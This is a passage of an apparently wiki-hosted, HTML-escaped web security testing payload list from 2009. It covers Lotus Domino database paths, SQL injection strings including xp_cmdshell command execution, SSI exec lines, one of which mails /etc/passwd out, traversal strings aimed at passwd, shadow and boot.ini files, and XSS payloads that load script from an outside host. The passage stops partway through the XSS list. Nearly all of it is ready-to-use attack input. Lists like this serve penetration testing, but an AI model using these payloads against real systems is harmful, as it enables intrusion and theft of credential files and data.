/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements  ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements &lt;br /&gt;
&amp;lt;pre&amp;gt;';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities) &lt;br /&gt;
&amp;lt;pre&amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
